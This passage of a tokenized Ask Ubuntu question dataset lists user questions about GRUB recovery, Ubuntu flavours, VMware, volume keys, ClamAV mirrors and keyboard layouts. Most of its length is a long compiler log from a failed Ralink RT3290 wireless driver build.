, have i done something wrong here that the first menu option is not working ? or , is this expected behavior ? finally , if this is to be expected , how do i get rid of the non-functioning option ?
360365	i ca n't access the recovery options pressing shift in the grub	i recently bought a used toshiba ac100 , with lubuntu 12.10 preinstalled . the problem is that the previous owner has lost the password , so i am unable to connect to wifi , change user etc . i have read the password recovery tips , and stumbled upon another problem : the shift key does n't bring up recovery mode options at startup . i tried pressing it repeatedly , holding it at different times , but with no result . it just goes from the toshiba splash screen to lubuntu at once ( no dual boot ) . also i am unable to edit grub from within lubuntu , since i lack the password . live cd wo n't help , as this laptop has no disc drive .
360367	what ubuntu type ( mythubuntu , xubuntu , etc . ) is most optimal for my system ?	the system specs are : nvidia geforce 6150se integrated gpu emachines 2 gb ddr2 ram ( came with 1 gb at store ) came with windows xp , have n't done anything to the os amd athlon 2850e 1.8 ghz 160 gb hdd
360368	find out date of last update ( by maintainer ) of an apt package	as seen in the title , i am wondering whether it is possible to find out the date of last update ( by maintainer ) of an apt package . this way i can get a sense of whether the package is obsolete . i tried both apt-cache show or packages.ubuntu.com , but seems there is no such information .
360373	vmware cursor problem	i am using vmware to create a windows 7 virtual machine . but everytime that i launch a game ( probably something else too , but mostly games ) my cursor get 's oversensitive that it 's almost impossible to move it without getting at the borders vmware workstation 10 with vmware tools installed using kde . using an touchpad ( notebook ) and a usb mouse .
360375	volume keys do n't work correctly anymore . what is due this ?	some time ago , i noticed that the volume keys no longer worked fine on 12.04 . for example , if i press the toggle key , the sound is muted . but if i press it again , the sound is no longer turned on . even the keys to increase and decrease the volume does not work well : they do not reach the lower and upper limits ( at least in the applet on the panel ) . what might be the problem ? what should i look for ?
360376	will windows applications run on ubuntu ?	if i switch to ubuntu from windows will my programs from windows still work on ubuntu ? or will i have to download the ubuntu counterpart of the program ?
360377	disabling databasemirror option in freshclam.cof	i am trying to make a local mirror for my signatures of clamav in ubuntu 12.04 but i can not erase the databasemirror option in file freshclam.conf and when i run freshclam command i get the signatures by using the option databasecustomurl , but at the end of the script the server search for signatures that are located in databasemirror and i get an error , but i dont need to do this last search , so i need to erase it , but clamav dont let me
360378	how to access the keyboard layout options in 13.10+	in 13.04 or below i only needed to access the keyboard layout and then click on the options button as seen in the image below : in 13.10 the options button is missing as seen in the following image : so what is the new method to access any and all keyboard layout options . in my case i wish to activate 3 of them , from killing x , to some custom keys .
360386	ralink 3290 does n't work , i ca n't compile rt2800sta	i 'm in ubuntu 13.10 64 bit and i ca n't make my wireless card work , at the beginning it connects but after a few network traffic it shuts down automatically . i can turn it on but then it ca n't connect to the modem , it just get stock in an infinite loop trying to connect , failing , connecting , failing ... i installed linux-headers and build-essential , then i downloaded the drivers from ralink 's official site . but i ca n't compile it . ( i wrote what happens down ) thanks in advance . make -c tools make [ 1 ] : ingresso nella directory `` /home/alex/dpo_rt3290_linuxsta_v2600_20120508/tools '' gcc -g bin2h.c -o bin2h make [ 1 ] : uscita dalla directory `` /home/alex/dpo_rt3290_linuxsta_v2600_20120508/tools '' /home/alex/dpo_rt3290_linuxsta_v2600_20120508/tools/bin2h cp -f os/linux/makefile.6 /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/makefile make -c /lib/modules/3.11.0-12-generic/build subdirs=/home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux modules make [ 1 ] : ingresso nella directory `` /usr/src/linux-headers-3.11.0-12-generic '' cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/crypt_md5.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/crypt_sha2.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/crypt_hmac.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/crypt_aes.o /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/crypt_aes.c : in function ‘aes_key_wrap’ : /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/crypt_aes.c:1466:6 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘long unsigned int’ [ -wformat= ] dbgprint ( rt_debug_error , ( `` aes_key_wrap : allocate % d bytes memory failure.\n '' , sizeof ( uint8 ) *plaintextlength ) ) ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/crypt_aes.c : in function ‘aes_key_unwrap’ : /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/crypt_aes.c:1561:6 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘long unsigned int’ [ -wformat= ] dbgprint ( rt_debug_error , ( `` aes_key_unwrap : allocate % d bytes memory failure.\n '' , sizeof ( uint8 ) *plainlength ) ) ; ^ cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/crypt_arc4.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/mlme.o in file included from /home/alex/dpo_rt3290_linuxsta_v2600_20120508/include/rtmp_os.h:42:0 , from /home/alex/dpo_rt3290_linuxsta_v2600_20120508/include/rtmp_comm.h:56 , from /home/alex/dpo_rt3290_linuxsta_v2600_20120508/include/rt_config.h:36 , from /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/mlme.c:30 : /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/mlme.c : in function ‘mlmeresetralinkcounters’ : /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/mlme.c:529:7 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] ( uint32 ) & pad- > ralinkcounters.onesecend - ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/include/os/rt_linux.h:463:76 : note : in definition of macro ‘ndiszeromemory’ # define ndiszeromemory ( destination , length ) memset ( destination , 0 , length ) ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/mlme.c:530:7 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] ( uint32 ) & pad- > ralinkcounters.onesecstart ) ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/include/os/rt_linux.h:463:76 : note : in definition of macro ‘ndiszeromemory’ # define ndiszeromemory ( destination , length ) memset ( destination , 0 , length ) ^ cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/cmm_wep.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/action.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/cmm_data.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/rtmp_init.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/rtmp_init_inf.o /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/rtmp_init_inf.c : in function ‘rt28xx_init’ : /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/rtmp_init_inf.c:162:3 : warning : format ‘ % x’ expects argument of type ‘unsigned int’ , but argument 2 has type ‘ulong’ [ -wformat= ] dbgprint ( rt_debug_off , ( `` pllctrl:0x % x\n '' , pllctrl.word ) ) ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/rtmp_init_inf.c:178:10 : warning : iso c90 forbids mixed declarations and code [ -wdeclaration-after-statement ] auto_wakeup_struc autowakeupcfg ; ^ cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/cmm_tkip.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/cmm_aes.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/cmm_sync.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/eeprom.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/cmm_sanity.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/cmm_info.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/cmm_cfg.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/cmm_wpa.o /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/cmm_wpa.c : in function ‘peerpairmsg3action’ : /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/cmm_wpa.c:1032:13 : warning : unused variable ‘cancelled’ [ -wunused-variable ] boolean cancelled ; ^ cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/cmm_radar.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/spectrum.o /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/spectrum.c : in function ‘peermeasurereportaction’ : /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/spectrum.c:1972:3 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘long unsigned int’ [ -wformat= ] dbgprint ( rt_debug_error , ( `` % s unable to alloc memory for measure report buffer ( size= % d ) .\n '' , __function__ , sizeof ( measure_rpi_report ) ) ) ; ^ cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/rtmp_timer.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/rt_channel.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/cmm_profile.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/cmm_asic.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/cmm_cmd.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/ps.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/uapsd.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../rate_ctrl/ra_ctrl.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../rate_ctrl/alg_legacy.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../rate_ctrl/alg_ags.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rtmp_chip.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../sta/assoc.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../sta/auth.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../sta/auth_rsp.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../sta/sync.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../sta/sanity.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../sta/rtmp_data.o /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../sta/rtmp_data.c : in function ‘stahandlerxdataframe’ : /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../sta/rtmp_data.c:283:17 : warning : unused variable ‘pfmectrl’ [ -wunused-variable ] frame_control *pfmectrl = & pheader- > fc ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../sta/rtmp_data.c:282:8 : warning : unused variable ‘oldpwrmgmt’ [ -wunused-variable ] uchar oldpwrmgmt = pwr_active ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../sta/rtmp_data.c : in function ‘stahandlerxmgmtframe’ : /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../sta/rtmp_data.c:766:5 : warning : iso c90 forbids mixed declarations and code [ -wdeclaration-after-statement ] uchar urssi2 ; ^ cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../sta/connect.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../sta/wpa.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../sta/sta_cfg.o /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../sta/sta_cfg.c : in function ‘rtmpqueryinformation’ : /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../sta/sta_cfg.c:3956:4 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘long unsigned int’ [ -wformat= ] dbgprint ( rt_debug_trace , ( `` sizeof uchar= % d , channel= % d \n '' , sizeof ( uchar ) , pad- > commoncfg.channel ) ) ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../sta/sta_cfg.c : in function ‘rtmpioctl_rt_private_get_statistics’ : /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../sta/sta_cfg.c:7220:1 : warning : format ‘ % x’ expects argument of type ‘unsigned int’ , but argument 3 has type ‘eeprom_nic_config3_struc’ [ -wformat= ] sprintf ( extra+strlen ( extra ) , `` pad- > nicconfig3.field.coexant == 0x % x\n\n '' , pad- > nicconfig3 ) ; ^ cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/rt_os_util.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/ba_action.o in file included from /home/alex/dpo_rt3290_linuxsta_v2600_20120508/include/rtmp_os.h:42:0 , from /home/alex/dpo_rt3290_linuxsta_v2600_20120508/include/rtmp_comm.h:56 , from /home/alex/dpo_rt3290_linuxsta_v2600_20120508/include/rt_config.h:36 , from /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/ba_action.c:3 : /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/ba_action.c : in function ‘convert_reordering_packet_to_preamsdu_or_802_3_packet’ : /home/alex/dpo_rt3290_linuxsta_v2600_20120508/include/os/rt_linux.h:992:34 : warning : assignment makes integer from pointer without a cast [ enabled by default ] ( ( rtpkt_to_ospkt ( _pkt ) ) - > tail ) = ( puchar ) ( ( _start ) + ( _len ) ) ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/include/os/rt_linux.h:1035:2 : note : in expansion of macro ‘set_os_pkt_datatail’ set_os_pkt_datatail ( __prxpkt , __pdata , __datasize ) ; \ ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/ba_action.c:1550:2 : note : in expansion of macro ‘rtmp_os_pkt_init’ rtmp_os_pkt_init ( prxblk- > prxpacket , ^ cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/rt_led.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/cmm_mac_pci.o /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/cmm_mac_pci.c : in function ‘rt28xxpcimlmeradioon’ : /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/cmm_mac_pci.c:2245:13 : warning : unused variable ‘cancelled’ [ -wunused-variable ] boolean cancelled ; ^ cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/cmm_data_pci.o /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/cmm_data_pci.c : in function ‘rtmpfreetxdupontxdmadone’ : /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/cmm_data_pci.c:543:8 : warning : unused variable ‘txwisize’ [ -wunused-variable ] uint8 txwisize = pad- > chipcap.txwisize ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/cmm_data_pci.c : in function ‘rtmphandlemgmtringdmadoneinterrupt’ : /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/cmm_data_pci.c:738:8 : warning : unused variable ‘txwisize’ [ -wunused-variable ] uint8 txwisize = pad- > chipcap.txwisize ; ^ cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/rtmp_mcu.o /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/rtmp_mcu.c : in function ‘rtmpasicsendcommandtomcu’ : /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/rtmp_mcu.c:464:8 : warning : unused variable ‘offset’ [ -wunused-variable ] ulong offset ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/rtmp_mcu.c:463:8 : warning : unused variable ‘configuration’ [ -wunused-variable ] ulong configuration ; ^ cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/ee_prom.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/ee_efuse.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/rt_rf.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt30xx.o cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.o /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c : in function ‘rt3290_asictxalcgetautoagcoffset’ : /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:1564:25 : warning : assignment discards ‘const’ qualifier from pointer target type [ enabled by default ] ptxpowertuningentry = & ( txpowertuningtable [ tuningtableindex + tx_power_tuning_entry_offset ] ) ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c : in function ‘mlmeantselection’ : /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2489:4 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat= ] dbgprint ( rt_debug_trace , ( `` ants : avgtxerrorratio = % d , txerrorratio = % d , accutxtotalcnt = % d , rssi = % d\n '' , avgtxerrorratio , txerrorratio , accutxtotalcnt , rssi ) ) ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2489:4 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘ulong’ [ -wformat= ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2489:4 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 4 has type ‘ulong’ [ -wformat= ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2507:5 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat= ] dbgprint ( rt_debug_trace , ( `` ants : train state : antennadiversitycount = % d\n '' , pad- > antennadiversityinfo.antennadiversitycount ) ) ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2522:5 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat= ] dbgprint ( rt_debug_trace , ( `` ants , ant 0 , tx : % d , rx : % d\n '' , pad- > antennadiversityinfo.antennadiversitytxpacketcount [ 0 ] , pad- > antennadiversityinfo.antennadiversityrxpacketcount [ 0 ] ) ) ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2522:5 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘ulong’ [ -wformat= ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2523:5 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat= ] dbgprint ( rt_debug_trace , ( `` ants , ant 1 , tx : % d , rx : % d\n '' , pad- > antennadiversityinfo.antennadiversitytxpacketcount [ 1 ] , pad- > antennadiversityinfo.antennadiversityrxpacketcount [ 1 ] ) ) ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2523:5 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘ulong’ [ -wformat= ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2526:5 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat= ] dbgprint ( rt_debug_trace , ( `` ants : train state : per [ main ] = % d , per [ aux ] = % d\n '' , pad- > antennadiversityinfo.antennadiversityper [ 0 ] , pad- > antennadiversityinfo.antennadiversityper [ 1 ] ) ) ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2526:5 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘ulong’ [ -wformat= ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2527:5 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat= ] dbgprint ( rt_debug_trace , ( `` ants : totaltxcount [ main ] = % d , totaltxcount [ aux ] = % d\n '' , pad- > antennadiversityinfo.antennadiversitytxpacketcount [ 0 ] , pad- > antennadiversityinfo.antennadiversitytxpacketcount [ 1 ] ) ) ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2527:5 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘ulong’ [ -wformat= ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2528:5 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat= ] dbgprint ( rt_debug_trace , ( `` ants : totalrxcount [ main ] = % d , totalrxcount [ aux ] = % d\n '' , pad- > antennadiversityinfo.antennadiversityrxpacketcount [ 0 ] , pad- > antennadiversityinfo.antennadiversityrxpacketcount [ 1 ] ) ) ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2528:5 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘ulong’ [ -wformat= ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2545:6 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat= ] dbgprint ( rt_debug_trace , ( `` ants : antsauxdelta = % d , antsrssifactor = % d , antsperfactor = % d\n '' , ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2545:6 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘ulong’ [ -wformat= ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2545:6 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 4 has type ‘ulong’ [ -wformat= ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2559:9 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat= ] dbgprint ( rt_debug_trace , ( `` ants : good rssi is at main ! ! ++ % d\n '' , ( diffrssi*ant0totalpacket/pad- > stacfg.antsrssifactor ) ) ) ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2565:9 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat= ] dbgprint ( rt_debug_trace , ( `` ants : good rssi is at aux ! ! ++ % d\n '' , ( diffrssi*ant1totalpacket/pad- > stacfg.antsrssifactor ) ) ) ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2574:8 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat= ] dbgprint ( rt_debug_trace , ( `` ants : good per is at main ! ! ++ % d\n '' , ( diffper*ant0totalpacket/pad- > stacfg.antsperfactor ) ) ) ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2581:8 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat= ] dbgprint ( rt_debug_trace , ( `` ants : good per is at aux ! ! ++ % d\n '' , ( diffper*ant1totalpacket/pad- > stacfg.antsperfactor ) ) ) ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2583:7 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat= ] dbgprint ( rt_debug_trace , ( `` ants : delta packet = % d , % d , diffrssi = % d , diffper = % d\n '' , ( diffrssi*ant0totalpacket/pad- > stacfg.antsrssifactor ) , ( diffper*ant1totalpacket/pad- > stacfg.antsperfactor ) , diffrssi , diffper ) ) ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2583:7 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘ulong’ [ -wformat= ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2595:6 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat= ] dbgprint ( rt_debug_trace , ( `` ants : stop train state : per [ main ] = % d , per [ aux ] = % d\n '' , pad- > antennadiversityinfo.antennadiversityper [ 0 ] , pad- > antennadiversityinfo.antennadiversityper [ 1 ] ) ) ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2595:6 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘ulong’ [ -wformat= ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2596:6 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat= ] dbgprint ( rt_debug_trace , ( `` ants : totaltxcount [ main ] = % d , totaltxcount [ aux ] = % d\n '' , pad- > antennadiversityinfo.antennadiversitytxpacketcount [ 0 ] , pad- > antennadiversityinfo.antennadiversitytxpacketcount [ 1 ] ) ) ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2596:6 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘ulong’ [ -wformat= ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2597:6 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat= ] dbgprint ( rt_debug_trace , ( `` ants : totalrxcount [ main ] = % d , totalrxcount [ aux ] = % d\n '' , pad- > antennadiversityinfo.antennadiversityrxpacketcount [ 0 ] , pad- > antennadiversityinfo.antennadiversityrxpacketcount [ 1 ] ) ) ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:2597:6 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘ulong’ [ -wformat= ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c : in function ‘btcoexsetting’ : /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:3244:4 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘ulong’ [ -wformat= ] dbgprint ( rt_debug_trace , ( `` % s : coex_mode is active ( two antenna mode ) ! ! ! coexmode = % d , bbpcurrentbw = % d , rssi = % d , rfr49value = 0x % x\n '' , ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c : in function ‘profile_twoant’ : /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../chips/rt3290.c:4097:2 : warning : format ‘ % x’ expects argument of type ‘unsigned int’ , but argument 2 has type ‘cmb_ctrl_struc’ [ -wformat= ] printk ( `` cmbctrl = % x\n '' , cmbctrl ) ; ^ cc [ m ] /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.o /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.c:43:23 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rt2860_remove_one’ static void __devexit rt2860_remove_one ( struct pci_dev *pci_dev ) ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.c:44:22 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rt2860_probe’ static int __devinit rt2860_probe ( struct pci_dev *pci_dev , const struct pci_device_id *ent ) ; ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.c:63:46 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘__devinitdata’ static struct pci_device_id rt2860_pci_tbl [ ] __devinitdata = ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.c:85:17 : error : ‘rt2860_pci_tbl’ undeclared here ( not in a function ) id_table : rt2860_pci_tbl , ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.c:86:17 : error : ‘rt2860_probe’ undeclared here ( not in a function ) probe : rt2860_probe , ^ /home/alex/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.c:88:5 : error : implicit declaration of function ‘__devexit_p’ [ -werror=implicit-function-declaration ] remove : __devexit_p ( 